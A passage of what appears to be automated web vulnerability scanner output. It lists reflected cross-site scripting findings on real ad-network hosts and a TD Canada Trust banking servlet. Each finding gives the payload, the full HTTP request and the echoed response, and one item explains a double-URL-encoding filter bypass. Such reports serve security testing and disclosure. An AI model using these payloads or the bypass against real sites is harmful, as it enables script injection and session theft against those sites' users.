<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/UndertoneB3/VolkswagenBTConqa164a"><script>alert(1)</script>3735745c4df/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236/222648376/x90/default/empty.gif/4d686437616b36427a6f4d4142706b56?x" target="_top">
...[SNIP]...

2.17. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a95f7"><script>alert(1)</script>e0eb1ad62ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/UndertoneB3/VolkswagenBTConq/11Q1a95f7"><script>alert(1)</script>e0eb1ad62ff/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129837051&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fcan_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J&refer=http%3A%2F%2Fwww.nypost.com%2F
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 399
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/UndertoneB3/VolkswagenBTConq/11Q1a95f7"><script>alert(1)</script>e0eb1ad62ff/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236/1132266778/x90/default/empty.gif/4d686437616b36427a6f554143347070?x" target="_top">
...[SNIP]...

2.18. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b455c"><script>alert(1)</script>824062a3ba3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Outb455c"><script>alert(1)</script>824062a3ba3/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129837051&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fcan_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J&refer=http%3A%2F%2Fwww.nypost.com%2F
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:24:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 399
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Outb455c"><script>alert(1)</script>824062a3ba3/300/1a8cf2cc3ea194958b161b3e3a0298236/1894369876/x90/default/empty.gif/4d686437616b36427a6f674141553177?x" target="_top">
...[SNIP]...

2.19. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65890"><script>alert(1)</script>061a8bb3469 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/30065890"><script>alert(1)</script>061a8bb3469/1a8cf2cc3ea194958b161b3e3a0298236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129837051&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fcan_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J&refer=http%3A%2F%2Fwww.nypost.com%2F
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:24:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 399
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/30065890"><script>alert(1)</script>061a8bb3469/1a8cf2cc3ea194958b161b3e3a0298236/1360511548/x90/default/empty.gif/4d686437616b36427a6f6f4142695369?x" target="_top">
...[SNIP]...

2.20. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd012"><script>alert(1)</script>e0a5a32a26b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90bd012"><script>alert(1)</script>e0a5a32a26b HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129837051&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fcan_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J&refer=http%3A%2F%2Fwww.nypost.com%2F
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:24:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236/675202630/x90bd012"><script>alert(1)</script>e0a5a32a26b/default/empty.gif/4d686437616b36427a6f774144492f73?x" target="_top">
...[SNIP]...

2.21. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 67884<script>alert(1)</script>37fc4b8b507 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_7939972614367884<script>alert(1)</script>37fc4b8b507&pid=9d40ff00-718e-d8e2-b18f-54978727399d&s=300x250&f=1.41&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F14%2Fnypost%2F300x250%2Frtb_tier1%3Ft%3D1317129678689%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26refer%3D&cid=oxpv1%3A34-632-1929-2158-6112&hrid=1cc78fdfdf489a12b2fcb8246e0a1cd8-1317129663 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6112&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1316390688; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

OXM_7939972614367884<script>alert(1)</script>37fc4b8b507({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGXPu07DMBgF4GOXpG5caAeKBEhcy2gpFydxh
...[SNIP]...

2.22. http://display.digitalriver.com/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76454'-alert(1)-'095f43d9065 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=24476454'-alert(1)-'095f43d9065&tax=par HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/linux/addons/?store_id=1&version=10.3.1&os=unix&key=PLSK016485370000
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; op393dr_homepage_demo1gum=a04e07i0a12794q0634yf92794r0652w9ba67; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:15:13 GMT
Server: Apache/2.2.9
Expires: Mon, 26 Sep 2011 20:45:13 GMT
Last-Modified: Mon, 26 Sep 2011 20:15:13 GMT
Content-Length: 229
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=24476454'-alert(1)-'095f43d9065&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

2.23. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e883f'-alert(1)-'d7dbdf96c29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=par&e883f'-alert(1)-'d7dbdf96c29=1 HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/linux/addons/?store_id=1&version=10.3.1&os=unix&key=PLSK016485370000
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; op393dr_homepage_demo1gum=a04e07i0a12794q0634yf92794r0652w9ba67; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:15:14 GMT
Server: Apache/2.2.9
Expires: Mon, 26 Sep 2011 20:45:14 GMT
Last-Modified: Mon, 26 Sep 2011 20:15:14 GMT
Content-Length: 232
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=par&e883f'-alert(1)-'d7dbdf96c29=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

2.24. http://display.digitalriver.com/ [tax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e85d8'-alert(1)-'bcb9eee57a0 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=pare85d8'-alert(1)-'bcb9eee57a0 HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/linux/addons/?store_id=1&version=10.3.1&os=unix&key=PLSK016485370000
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; op393dr_homepage_demo1gum=a04e07i0a12794q0634yf92794r0652w9ba67; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:15:14 GMT
Server: Apache/2.2.9
Expires: Mon, 26 Sep 2011 20:45:14 GMT
Last-Modified: Mon, 26 Sep 2011 20:15:14 GMT
Content-Length: 229
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=pare85d8'-alert(1)-'bcb9eee57a0';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

2.25. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11185989978@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1dd"><script>alert(1)</script>ece6008162f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM3d1dd"><script>alert(1)</script>ece6008162f/2010DM/11185989978@x23?USNetwork/VWBTC_11Q1_UT_Tig_Out_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:23:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM3d1dd"><script>alert(1)</script>ece6008162f/2010DM/1436452190/x23/default/empty.gif/4d686437616b36427a6d774141723467?x" target="_top"><
...[SNIP]...

2.26. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11185989978@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3cb"><script>alert(1)</script>7f37702551d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbc3cb"><script>alert(1)</script>7f37702551d/11185989978@x23?USNetwork/VWBTC_11Q1_UT_Tig_Out_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:23:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbc3cb"><script>alert(1)</script>7f37702551d/1068393192/x23/default/empty.gif/4d686437616b36427a6d3441436b656e?x" target="_top"><
...[SNIP]...

2.27. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11185989978@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c19b"><script>alert(1)</script>59ce673466e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11185989978@x234c19b"><script>alert(1)</script>59ce673466e?USNetwork/VWBTC_11Q1_UT_Tig_Out_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:24:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/640712618/x234c19b"><script>alert(1)</script>59ce673466e/default/empty.gif/4d686437616b36427a6e4541424e5947?x" target="_top"><I
...[SNIP]...

2.28. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [USNetwork/VWBTC_11Q1_UT_Tig_Out_300 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11185989978@x23

Issue detail

The value of the USNetwork/VWBTC_11Q1_UT_Tig_Out_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d856"-alert(1)-"a6ce7e794ef was submitted in the USNetwork/VWBTC_11Q1_UT_Tig_Out_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11185989978@x23?USNetwork/VWBTC_11Q1_UT_Tig_Out_3006d856"-alert(1)-"a6ce7e794ef HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:23:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3282
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/VWBTC_11Q1_UT_Tig_Out_3006d856"-alert(1)-"a6ce7e794ef";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){

   if((cookie_check("optouts=",document.cookie)).length == 0) {
       if((cookie_check("dlx_20100929=",doc
...[SNIP]...

2.29. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11185989978@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f8d"-alert(1)-"3c2efd543d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11185989978@x23?USNetwork/VWBTC_11Q1_UT_Tig_Out_300&25f8d"-alert(1)-"3c2efd543d9=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:23:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3285
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/VWBTC_11Q1_UT_Tig_Out_300&25f8d"-alert(1)-"3c2efd543d9=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){

   if((cookie_check("optouts=",document.cookie)).length == 0) {
       if((cookie_check("dlx_20100929=",d
...[SNIP]...

2.30. https://easywebsoc.tdcanadatrust.com/servlet/ca.tdbank.banking.servlet.DefaultServlet [FPL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://easywebsoc.tdcanadatrust.com
Path:   /servlet/ca.tdbank.banking.servlet.DefaultServlet

Issue detail

The value of the FPL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 404bd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec247f5df9d1 was submitted in the FPL parameter. This input was echoed as 404bd"><script>alert(1)</script>c247f5df9d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the FPL request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /servlet/ca.tdbank.banking.servlet.DefaultServlet?referer=main&FPL=CORE404bd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec247f5df9d1 HTTP/1.1
